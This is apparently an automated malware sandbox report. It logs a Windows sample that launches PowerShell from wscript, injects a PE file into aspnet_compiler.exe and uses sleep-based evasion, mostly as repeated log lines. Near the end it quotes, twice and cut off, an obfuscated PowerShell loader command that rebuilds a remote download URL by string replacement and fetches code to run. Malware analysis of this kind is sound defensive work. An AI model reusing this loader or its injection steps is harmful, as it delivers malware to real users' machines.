Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 804Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4113Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5111Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 2599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 6526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 611
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.3.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.3.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regionsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 989008Jump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-